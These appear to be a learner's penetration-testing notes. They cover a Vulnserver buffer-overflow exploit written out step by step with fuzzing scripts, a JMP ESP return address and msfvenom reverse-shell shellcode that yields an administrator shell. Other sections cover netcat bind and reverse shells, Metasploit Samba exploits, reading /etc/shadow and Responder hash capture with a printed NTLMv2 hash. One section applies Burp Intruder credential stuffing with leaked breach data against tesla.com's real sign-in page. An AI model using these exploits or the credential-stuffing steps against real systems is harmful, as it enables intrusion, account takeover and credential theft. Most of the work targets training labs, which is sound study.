msf5 auxiliary(scanner/ssh/ssh_login)> set verbose true
msf5 auxiliary(scanner/ssh/ssh_login)> run

if there was any success in cracking brute force password the results will show otherwise  wont be a single success attempt. 

Credential Stuffing and Password spraying 

Breach-parse: to collect data from 1.4 billion clear text leakage. 
Trying to use the password and user name from the breach-parse data derived 

FoxyProxy Standard 

adding to the firefox 
This makes proxy to be turned on aff with just a button for burp suite

Now opening the tesla.com and into signing page giving dummy email and password, 
such the burp suite captures the intercept. 
Now sending this intercept right " send to intruder"
Now in intruder tab -> Positions Tab -> click clear button. 
Now selecting the email - click add  button and password - add button 
Change attack type - Pitchfork
Under payloads tab, copying the username and password
 Payload set 1 -> Paste username
 Payload set 2 -> password
Click Start Attack
Now looking in the attack result 
Now just copying the error message - "we could not sign you in" and adding to Options tab -> GREP Match
GREP match -> clear -> paste ->we could not sign you in


Once again start the attack 
 the checkboxes shows that user was not signed in. 

Password Spraying :

Here the username is changed and password is kept constant. 

Pentest Report- revisited 

***********************************

Building vulnerable machine and attack machine.

Downloading ISO image from Microsoft for Virtual Box

windows-10-enterprise

https://www.microsoft.com/en-us/evalcenter/download-windows-10-enterprise

windows-server-2016

https://www.microsoft.com/en-gb/evalcenter/download-windows-server-2016

Vulnserver

https://thegreycorner.com/vulnserver.html

Immunity Debugger

https://www.immunityinc.com/products/debugger/

Buffer overflow

Steps to conduct a Buffer overflow



  1. Spiking
  2. Fuzzing
  3. Finding the offset
  4. Overwriting the EIP
  5. Finding Bad Characters 
  6. Finding Right Modules
  7. Generating shellcode

Spiking

  • Starting Vulnserver with admin access. 
  • Starting Immunity debugger with admin access - File -> attach -> Vulnserver; Then click run
    • Finding ip address = 10.0.2.5

 Starting Kali linux machine

kali)-[~] # sudo nc -nv 10.0.2.5 9999 
(UNKNOWN) [10.0.2.5] 9999 (?) open
Welcome to Vulnerable Server! Enter HELP for help.

Now trying to get  overflow the stack with below command
kali)-[~]# generic_send_tcp 
argc=1
Usage: ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
./generic_send_tcp 192.168.1.100 701 something.spk 0 0

Kali)-[~]$ gedit stats.spk
s_readline();
s_string("STATS ");
s_string_variable("0");
Trying to execute
Kali)-[~]$ generic_send_tcp 10.0.2.5 9999 stats.spk 0 0

Killing the processes, as the Vulnserver is still not crashed. 
Changing the script
 Kali)-[~]$ cat stats.spk                               
s_readline();
s_string("TRUN ");
s_string_variable("0");
Kali)-[~] $ generic_send_tcp 10.0.2.5 9999 stats.spk 0 0
After this command the Vulnserver has crashed. THe buffer has overflowed to EIP.

FUZZING 

kali)-[/home/kali] ~ # cat 1.py     
#!/usr/lib/python3
import sys, socket
from time import sleep

buffer = "A" * 100

while True:
        try:
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                s.connect(('10.0.2.5',9999))

                s.send(('TRUN /.:/' + buffer))
                s.close()
                sleep(1)
                buffer = buffer + "A"*100
        except:
                print ("FUZZING crashed with error: %s" % str(len(buffer)))
                sys.exit()

kali)-[/home/kali] ~# python 1.py
kali)-[/home/kali]
└─# python 1.py
^CFUZZING crashed with error: 2700

Now we need to control the EIP value to gain root access.

Finding the Offset

Using the metasploit tool pattern
kali)-[/home/kali] ~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

㉿kali)-[/home/kali] ~# cat 2.py     
#!/usr/lib/python3
import sys, socket


offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"


try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.0.2.5',9999))
        s.send(('TRUN /.:/' + offset))
        s.close()

except:
        print ("Error connecting to server" )
        sys.exit()
                   
kali)-[/home/kali] ~ # python 2.py
After executing the command, the vulnserver crashjed and the value is updated in EIP 
kali)-[/home/kali]─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337 
[*] Exact match at offset 2003

Overwriting the EIP

㉿kali)-[/home/kali]─# cat 3.py     
#!/usr/lib/python3
import sys, socket

shellcode = "A" * 2003 + "B" * 4


try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.0.2.5',9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()

except:
        print ("Error connecting to server" )
        sys.exit()
                                                                                                                                                         
kali)-[/home/kali]─# python 3.py

Finding Bad Characters

https://github.com/cytopia/badchars
kali)-[~]─$ cat 3.py      
#!/usr/lib/python3
import sys, socket

badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

shellcode = "A" * 2003 + "B" * 4 + badchars 


try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.0.2.5',9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()

except:
        print ("Error connecting to server" )
        sys.exit()

kali)-[~]$ python 3.py 


Below are the identified bad characters, where there are consecutive characters the first one is the bad characters.   
                 

Finding the Right Module

Trying to find the memory module which has no memory protections. Using https://github.com/corelan/mona with immunity debugger.
Mona.py file if copied in to immunity debugger folder - this PC - C:\ProgramsFiles(x86)\Immunity Inc\Ummunity Debugger\PyCommands\


Now trying to find the OP code equivalent of junk
kali)-[~]─# locate nasm_shell
/usr/bin/msf-nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
kali)-[~]─# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp
nasm > exit
Now on the immunity debugger, searching the code !mona find -s "\xff\xe4" -m essfunc.dll

Here the 625011af is the value got from above search and writing in reverse order which is the syntax format - "\xaf\x11\x50\x62"
kali)-[~]─$ cat 3.py       
#!/usr/lib/python3
import sys, socket
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"
try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.0.2.5',9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()
except:
        print ("Error connecting to server" )
        sys.exit()                                                                       
kali)-[~]─$ 
Now finding the 625011af in immunity debugger

Setting a break point by pressing F2

Now executing the code in kali
kali)-[~]─$ sudo gedit 3.py

Generating Shellcode and Gaining Root

Generating shell code
Here the Lhost is kali linux machine and -a is architecture and -b is the bad characters.  
kali)-[~]─# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.6 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00" 

Here in the code - shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow 
the \x90 * 32 is adding padding or space after the EIP, to make sure the overflow command works  

kali)-[~]─$ cat 3.py       
#!/usr/lib/python3
import sys, socket

overflow = ("\xd9\xc2\xd9\x74\x24\xf4\x58\xba\x3f\x77\x1b\xfa\x33\xc9"
"\xb1\x52\x31\x50\x17\x83\xc0\x04\x03\x6f\x64\xf9\x0f\x73"
"\x62\x7f\xef\x8b\x73\xe0\x79\x6e\x42\x20\x1d\xfb\xf5\x90"
"\x55\xa9\xf9\x5b\x3b\x59\x89\x2e\x94\x6e\x3a\x84\xc2\x41"
"\xbb\xb5\x37\xc0\x3f\xc4\x6b\x22\x01\x07\x7e\x23\x46\x7a"
"\x73\x71\x1f\xf0\x26\x65\x14\x4c\xfb\x0e\x66\x40\x7b\xf3"
"\x3f\x63\xaa\xa2\x34\x3a\x6c\x45\x98\x36\x25\x5d\xfd\x73"
"\xff\xd6\x35\x0f\xfe\x3e\x04\xf0\xad\x7f\xa8\x03\xaf\xb8"
"\x0f\xfc\xda\xb0\x73\x81\xdc\x07\x09\x5d\x68\x93\xa9\x16"
"\xca\x7f\x4b\xfa\x8d\xf4\x47\xb7\xda\x52\x44\x46\x0e\xe9"
"\x70\xc3\xb1\x3d\xf1\x97\x95\x99\x59\x43\xb7\xb8\x07\x22"
"\xc8\xda\xe7\x9b\x6c\x91\x0a\xcf\x1c\xf8\x42\x3c\x2d\x02"
"\x93\x2a\x26\x71\xa1\xf5\x9c\x1d\x89\x7e\x3b\xda\xee\x54"
"\xfb\x74\x11\x57\xfc\x5d\xd6\x03\xac\xf5\xff\x2b\x27\x05"
"\xff\xf9\xe8\x55\xaf\x51\x49\x05\x0f\x02\x21\x4f\x80\x7d"
"\x51\x70\x4a\x16\xf8\x8b\x1d\x13\xfd\x91\xdb\x4b\xff\x95"
"\xf2\xd7\x76\x73\x9e\xf7\xde\x2c\x37\x61\x7b\xa6\xa6\x6e"
"\x51\xc3\xe9\xe5\x56\x34\xa7\x0d\x12\x26\x50\xfe\x69\x14"
"\xf7\x01\x44\x30\x9b\x90\x03\xc0\xd2\x88\x9b\x97\xb3\x7f"
"\xd2\x7d\x2e\xd9\x4c\x63\xb3\xbf\xb7\x27\x68\x7c\x39\xa6"
"\xfd\x38\x1d\xb8\x3b\xc0\x19\xec\x93\x97\xf7\x5a\x52\x4e"
"\xb6\x34\x0c\x3d\x10\xd0\xc9\x0d\xa3\xa6\xd5\x5b\x55\x46"
"\x67\x32\x20\x79\x48\xd2\xa4\x02\xb4\x42\x4a\xd9\x7c\x62"
"\xa9\xcb\x88\x0b\x74\x9e\x30\x56\x87\x75\x76\x6f\x04\x7f"
"\x07\x94\x14\x0a\x02\xd0\x92\xe7\x7e\x49\x77\x07\x2c\x6a"
"\x52")

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow

try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.0.2.5',9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()
except:
        print ("Error connecting to server" )
        sys.exit()
                                                      
kali)-[~]─$ 
Another window opening listen command.  
kali)-[~]─$ nc -nvlp 4444
listening on [any] 4444 ...
Executing the python code:
kali)-[~]─$ python 3.py

After the 3.py execution, the root access is achieved, the same can be seen in the listening port window.   
kali)-[~]─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.0.2.6] from (UNKNOWN) [10.0.2.5] 49926
Microsoft Windows [Version 10.0.19045.2604]
(c) Microsoft Corporation. All rights reserved.

C:\Users\fcastle\Downloads\vulnserver-master\vulnserver-master>whoami
whoami
marvel\administrator

C:\Users\fcastle\Downloads\vulnserver-master\vulnserver-master>
   

************************************************************************************

HANDS ON EXPERIENCE

************************************************************************************

01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]


  • Taking any active machine 

  • Scanning for the ip address of the HTB

    • Nmap -sU T4 10.10.10.133 #this is udp scan

    • Nmap -T4 -p- 10.10.10.133 # this is tcp scan

    • Inference - when the results show 22/tcp & 80/tcp find some sort of exploit that leads to credentials. That credentials will lead to login at port 22 

    • Also chance for getting remote exploitation on port 80

      • Pasting on the browser 10.10.10.133 leads to openpage

      • Viewing page source 

        • Page source information show - http://onetwoseven.htb:60080

    • Changing localDNS, such that the page can be accessed when visiting http://onetwoseven.htb:60080

      • root@kali:~#Gedit /etc/hosts

      • Adding the ip address and http://onetwoseven.htb:60080

      • Now entering http://onetwoseven.htb

      • root@kali:~# nikto -h onetwoseven.htb

        • Results - server apache 2.4.5

        • Server leaks via etags

      • root@kali:~# sftp ots-5MmY2Y@onetwoseven.htb

      • Noe after posting the password , accessed is gained

      • sftp> ls

      • sftp> get index.html

    • root@kali:~# cat index.html

    • Based on the information getting into the url http://onetwoseven.htb/dist/img

    • root@kali:~# gedit index.html

    • Changing the image to donkey-ddos-jpg

      • sftp> put index.html

      • Recheck the url , now donkey image is displayed


  • root@kali:~# dirbuster

    • Target url 192.168.202.130

    • File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/

      • Select any file - for time being use- directory-list-lowercase-2-3-small.txt

    • File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.

Exploitation, Shells, Credential stuffing

Netcat Reverse shell

Target machine to Attackbox 

Netcat Bind shell

Attackbox connected to Target machine


From Victim machine 4445 is opened: 

  • root@kali:~# nc -lvp 4445 -e /bin/bash


From attacker machine :  

  • root@kali:~# nc 192.168.202.129 4445

  • Connection is established and able to connect to the shell 


Apache 1.3.20 vulnerabilities 

Apache 1.3.20 vulnerabilities can be executed using Burp suite, leaking Etags, OpenSSL/0.9, mod_ssl/2/8.4 are vul, some directories found.
  • root@kali:~# curl --head 192.168.202.130
    • Now taking a note
      • Server header info disclosure(low)
        • 192.168.202.130 : Copy IP address and paste screenshot
      • Default 404 info disclosure (low)
        • 192.168.202.130/asdewgfnk : Copy IP address and paste screenshot
  • root@kali:~# nmap –script=ssl-enum-ciphers -p 443 192.168.202.130
    • Now taking a note
      • Weak Ciphers
      • 192.168.202.130 : Copy IP address and paste screenshot :- least strength F
  • Now search for Apache 1.3.20 vulnerabilities on web 
    • Exploit Database https://www.exploit-db.com/
    • root@kali:~# searchsploit apache
  • Now trying to get more information on Port 139 open Samba smdb
    • root@kali:~# smbclient -L \\\\192.168.202.130
    • root@kali:~# smbclient -L \\\\192.168.202.130\\IPC$
    • NESSUS scan report vulnerability - SMB Signing not required shown as vul.
  •  Now root@kali:~# msfconsole
    • msf5> search smb
    • msf5> use auxiliary/scanner/smb/smb_version
    • msf5 auxiliary(scanner/smb/smb_version) > options
    • msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
    • msf5 auxiliary(scanner/smb/smb_version) > run
      • root@kali:~# searchsploit samba 2.2
        • There are more trans2open exploits 
    • msf5 auxiliary(scanner/smb/smb_version) > search trans2open 
    • msf5 auxiliary(scanner/smb/smb_version) > info exploit/linux/samba/trans2open


Now Continuation from earlier Apache searching the web for OPENLUCK vulnerabilities 


  • root@kali:~# git clone https://github.com/heltonWernik/OpenLuck

  • Install ssl-dev library

  • apt-get install libssl-dev

  • gcc -o OpenFuck OpenFuck.c -lcrypto

  • Running the Exploit

  • ./OpenFuck

  • /OpenFuck 0x6b 192.168.202.130 -c 40

  • After running the exploit the root privilege is gained

Now Trying to enumerate from the root using below commands

  • Arp -a

  • Route

  • Sudo -l

  • Pwd # working directory

Trying to get password hashes 

  • Cat /etc/shadow

Trying here to find some other connected sub networks using the above commands also.


Now root@kali:~# msfconsole

msf5>

  • msf5> search smb

  • msf5> use auxiliary/scanner/smb/smb_version

  • msf5 auxiliary(scanner/smb/smb_version) > options

  • msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130

  • msf5 auxiliary(scanner/smb/smb_version) > run

Searching for samba 2.2.1a exploit on google

  • msf5 auxiliary(scanner/smb/smb_version) >  search trans2open

  • msf5 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open

  • Msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.202.130

  • msf5 exploit(linux/samba/trans2open) > info

  • msf5 exploit(linux/samba/trans2open) > run

  • msf5 exploit(linux/samba/trans2open) > ^C # here there no no connection or exploit not working, hence looking for other options

  • msf5 exploit(linux/samba/trans2open) > options

  • msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp

    • This is the non staged payload where is he no /slash

    • For Staged payload there is / after shell 

  • msf5 exploit(linux/samba/trans2open) > options

  • msf5 exploit(linux/samba/trans2open) > run

  • It was success and root access is achieved


Now connecting to HackTheBox HTB

Retired machine - Lame - 10.10.10.3


root@kali :~ # nmap -T4 -p- -A 10.10.10.3

  • 22/tcp open ssh : When SSH is open brute force can be tried to open

  • 139, 445 - netbios samba 3.0.20-Debian  

root@kali :~ # ftp 10.10.10.3

  • Username and password :- anonymous 

  • ftp > help

  • ftp> ls

Checking for exploit :-  vsftpd 2.3.4 on google

Checking for exploit : - smbd 3.0.20 on google - got some info on username map script


Opening metasploit to search for username map script

Now root@kali:~# msfconsole

msf5>search usermap

msf5 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3

msf5 exploit(multi/samba/usermap_script) > run

  • cat /etc/shadow/

  • arp -a

  • route

Check all the files to see for important data and CTF - catch the flag required to search all the files to find the CTF

****************************************************************************

02 - VULNERABLE MACHINE: ACTIVE DIRECTORY

Downloading ISO image from Microsoft

https://www.microsoft.com/en-us/evalcenter/download-windows-10-enterprise
https://www.microsoft.com/en-gb/evalcenter/download-windows-server-2016

Setting up the VM installation:

For both the machines & Kali - set network to NATnetwork

WIN 2016 SERVER

  • While setting up 2016 server, go to setting and remove the floppy drive component
  • Setting up compromised password :- Admin : Password1
  • PC to be discoverable = Yes 
  • Configure this local server
  • Add roles & features 
  • Role based,next & next
  • Active directory domain service - add features
  • Next, next, install- close
  • Click on the flag - Promote this server  domain controller
  • Add new forest 
  • Setting up compromised password :- Admin : Pass$123
  • Next,next,next,next,install, after reboot
  • Tools p Active directory Users and computers 
  • Marvel.local - users- rgt Click- new user.
  • CMD -ipconfig
  • After adding fcastle to domain 
  • Server manager - Files shares and services - shares
  • Top right- Tasks- New share - SMB share quick- click next
  • select custom folder- then folder created, next, then, select enable access-based enumeration 
  • Next, then click create


WIN 2010 ENTERPRISE 

  • Domain join instead
  • Just name localfrank/Password2, next-
  • Skip cortna
  • Uncheck all then accept
  • Rename the PC
  • Network & internet settings :- change adaptor settings -properties - double click  internet protocol version4 - 
  • Use the following DNS server address - copy the IP address from win 2016 serv
  • Search domain - click connect - 
  • Join the domain - marvel.local
  • fcastle/std user
  • After creating share folder, mapping the folder
  • Under mypc - then- computer options- map the drive - \\HYDRA\hackme. 

Attack to be performed - LLMNR/NBT-NS poisoning 


┌──(root㉿kali)-[/usr/share/responder]
└─# python3 Responder.py -I eth0 -dw

Win10:- The ip address of the Kali on the folder address bar : 10.0.2.6

Output on (root㉿kali) - 
[SMB] NTLMv2-SSP Client   : 10.0.2.5
[SMB] NTLMv2-SSP Username : MARVEL\fcastle
[SMB] NTLMv2-SSP Hash     : fcastle::MARVEL:b21d516efae94724:A6D0581483609456B43CEE7C82B37E82:0101000000000000002CE8DF1F4DD901E32465EF4342A6F600000000020008004A0035003700450001001E00570049004E002D0038003200420055003600350052005300530033004F0004003400570049004E002D0038003200420055003600350052005300530033004F002E004A003500370045002E004C004F00430041004C00030014004A003500370045002E004C004F00430041004C00050014004A003500370045002E004C004F00430041004C0007000800002CE8DF1F4DD901060004000200000008003000300000000000000000000000002000008F2B9C4D6C9E4FC9F2090A3CF23E6A2AA75EAD2929F61874FA50FE2C82DE3CD60A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0030002E0032002E0036000000000000000000

Hash data is captured 

These tests can be done against the default credentials for the IOT devices - like printers which has SMB share.
************************************************************************************

03 - VULNERABLE MACHINE : BLUE




BLUE Vlun Machine
BLUE Vlun Machine

kali)-[~] └─$ sudo nmap -F -A -T4 10.0.2.7
Nmap scan report for 10.0.2.7
Host is up (0.00082s latency).
Not shown: 92 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:2A:95:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
(kali㉿kali)-[~]
└─$ sudo nmap --script vuln 10.0.2.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:55 EDT
Nmap scan report for 10.0.2.7
Host is up (0.0022s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49158/tcp open  unknown
MAC Address: 08:00:27:2A:95:91 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
